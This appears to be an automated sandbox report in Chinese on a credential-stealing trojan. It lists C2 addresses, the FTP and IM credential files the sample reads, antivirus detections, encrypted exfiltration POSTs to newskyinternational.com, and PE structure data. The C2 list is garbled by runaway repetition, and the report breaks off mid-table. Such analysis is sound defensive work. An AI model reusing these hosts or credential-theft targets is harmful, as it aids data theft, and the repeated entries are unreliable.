C2:
C2: /WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: 162.241.225.102
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
C2: /WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php/WebPanel/api.php
从本地FTP客户端软件中盗取账号密码数据
file: C:\Users\test\AppData\Roaming\FileZilla\recentservers.xml
file: C:\Users\test\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini
key: HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites
盗取已安装的即时消息客户端相关的信息
file: C:\Users\test\AppData\Roaming\.purple\accounts.xml
key: HKEY_CURRENT_USER\Software\Paltalk
文件已被至少十个VirusTotal上的反病毒引擎检测为病毒
MicroWorld-eScan: Gen:Variant.Razy.360881
McAfee: Trojan-FPRM!949755B8F6A4
Cylance: Unsafe
AegisLab: Worm.MSIL.Agent.lmXx
K7AntiVirus: Trojan ( 00533ba61 )
K7GW: Trojan ( 00533ba61 )
TrendMicro: TROJ_GEN.R020C0DGJ18
Baidu: Win32.Trojan.WisdomEyes.16070401.9500.9999
NANO-Antivirus: Trojan.Win32.Kryptik.ffmqvm
Symantec: Trojan.Gen.2
ESET-NOD32: a variant of MSIL/Kryptik.OHR
TrendMicro-HouseCall: TROJ_GEN.R020C0DGJ18
Paloalto: generic.ml
ClamAV: Win.Packed.Razy-6615989-0
GData: Gen:Variant.Razy.360881
Kaspersky: HEUR:Trojan.Win32.Agent.gen
BitDefender: Gen:Variant.Razy.360881
Avast: Win32:GenX
Ad-Aware: Gen:Variant.Razy.360881
Sophos: Mal/Generic-S
Comodo: .UnclassifiedMalware
F-Secure: Gen:Variant.Razy.360881
DrWeb: Trojan.PWS.Stealer.19347
Invincea: heuristic
McAfee-GW-Edition: BehavesLike.Win32.Generic.fh
Emsisoft: Gen:Variant.Razy.360881 (B)
SentinelOne: static engine - malicious
Cyren: W32/Trojan.WREP-2865
Avira: HEUR/AGEN.1025206
MAX: malware (ai score=98)
Antiy-AVL: HackTool[VirTool]/MSIL.Injector
Endgame: malicious (high confidence)
Arcabit: Trojan.Razy.D581B1
ZoneAlarm: HEUR:Trojan.Win32.Agent.gen
AhnLab-V3: Trojan/Win32.Upatre.R231775
ALYac: Trojan.Agent.Upatre
Malwarebytes: Spyware.AgentTesla
Ikarus: Trojan-Spy.Agent
Fortinet: MSIL/Kryptik.OHR!tr
AVG: Win32:GenX
Cybereason: malicious.bdff5a
Panda: Trj/GdSda.A
CrowdStrike: malicious_confidence_100% (D)
Qihoo-360: HEUR/QVM03.0.9DB1.Malware.Gen
运行截图
网络分析
访问主机记录
直接访问 |
IP地址 |
国家名 |
否 |
162.241.225.102 |
United States |
否 |
162.88.100.200 |
United States |
域名解析
域名 |
响应 |
checkip.dyndns.org |
A 131.186.113.135
A 162.88.100.200
A 216.146.43.71
A 131.186.113.136
A 216.146.38.70
CNAME checkip.dyndns.com
A 162.88.96.194
|
newskyinternational.com |
A 162.241.225.102
|
TCP连接
IP地址 |
端口 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.241.225.102 |
80 |
162.88.100.200 |
80 |
162.88.100.200 |
80 |
UDP连接
IP地址 |
端口 |
192.168.122.1 |
53 |
192.168.122.1 |
53 |
HTTP请求
URL |
HTTP数据 |
http://checkip.dyndns.org/ |
GET / HTTP/1.1
Host: checkip.dyndns.org
Connection: Keep-Alive
|
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 286
Expect: 100-continue
Connection: Keep-Alive
|
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 324
Expect: 100-continue
|
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 314
Expect: 100-continue
|
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 314
Expect: 100-continue
p=EmZKrUTp3d4tHBRf%2BrVRl83BzwyEp7vTyKfJ0MpC1BYQdNU/LNTV5fVLeLuMBGfNrRlOS1O2B8w0m/iQBuFuE1/ibaMcbAS1d/SUMXDXl8SaFwcUViuVQGbg1R03ncZet2f%2BR2i%2BmeoTKIUeUXT6tBGeNAa5WQqUVdlYP4LTrR9hTgOk4BYWOSchAPQ9Xhckq%2BIllD7imBU/9mp0pt8DTahIO9aEFcQHO%2BVEv0ohap47biDprqlQqmzpyXEr/M/ZVXllPgf09svD8fSEnRpoQ%2Boir5cZMIx0R5Wu0lWsIZs= |
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 288
Expect: 100-continue
Connection: Keep-Alive
|
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 286
Expect: 100-continue
|
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 322
Expect: 100-continue
|
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 66596
Expect: 100-continue
|
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 322
Expect: 100-continue
p=BEmO9zSQxPNbRWmt35dl4UcdWWwNeJ4HECQ18lSSNXA34mEa6qd1GWWABz/ATQM/x3i6O/4tx8dZBMmKg67VT4hR1MfbiT8ZuRlRVcMP5xdr99vcMXlBF1VEm4i3A/WamBzqyKQ/0Dd7pX6XGN3EmzVdYqwxQYZtaN0o%2Bb5sxNOR5%2BId7PBRPjXWHGzYIk9wY47RexXxFjzioIi9Ioh9egFUJ97067nFHUoZAs2ej5W5bZ%2BncBLJAswAE1QcA9Uz2Xka6YuOzKsU3i7Wi/HNg5z7MvWeONXGIb97HKjRFfb%2BA6YF9dDS6Q== |
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 324
Expect: 100-continue
p=BEmO9zSQxPNbRWmt35dl4UcdWWwNeJ4HECQ18lSSNXA34mEa6qd1GWWABz/ATQM/x3i6O/4tx8dZBMmKg67VT4hR1MfbiT8ZymcaUfX9lABOPpU0LBSO%2B1VEm4i3A/WamBzqyKQ/0Dd7pX6XGN3EmzVdYqwxQYZtaN0o%2Bb5sxNOR5%2BId7PBRPjXWHGzYIk9wY47RexXxFjzioIi9Ioh9egFUJ97067nFHUoZAs2ej5W5bZ%2BncBLJAswAE1QcA9Uz2Xka6YuOzKsU3i7Wi/HNg5z7MvWeONXGIb97HKjRFfb%2BA6YF9dDS6Q== |
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 66598
Expect: 100-continue
|
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 68174
Expect: 100-continue
|
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 286
Expect: 100-continue
p=G1DZYwdIiDZ6V83seaZCmb3lNHQ9jFz9S1trgT9pB0gEhegVG5AXSLq/eNOcoam8PExE/dGbiFbZdI6uJmXlSdqYLYuTR%2BlFVl%2B5deG0RnTTo6nFc1M9tx0%2BRo7WXetRdIHkmVMMSeqH%2BEroM7yttDzosvKfKgB%2BJ07oqT/YvQ6CPNW2%2BCETCU6oIlO9XYyrEy6/hYeF%2BgkfRc9xSEfZhh/7Wk0khJ4zZJ3cjEvXDxJcQWA739/yDfxk7Bq%2BMPIeFuYVGUohcCs= |
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 68156
Expect: 100-continue
|
http://newskyinternational.com/WebPanel/api.php |
POST /WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: newskyinternational.com
Content-Length: 326
Expect: 100-continue
|
静态分析
PE数据组成
名称 |
虚拟地址 |
虚拟大小 |
原始数据大小 |
特征 |
熵(Entropy) |
.text |
0x00002000 |
0x000329d4 |
0x00032a00 |
IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ |
7.99 |
.rsrc |
0x00036000 |
0x00028e7c |
0x00029000 |
IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ |
3.11 |
.reloc |
0x00060000 |
0x0000000c |
0x00000200 |
IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ |
0.10 |
资源
名称 |
偏移量 |
大小 |
语言 |
子语言 |
熵(Entropy) |
文件类型 |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
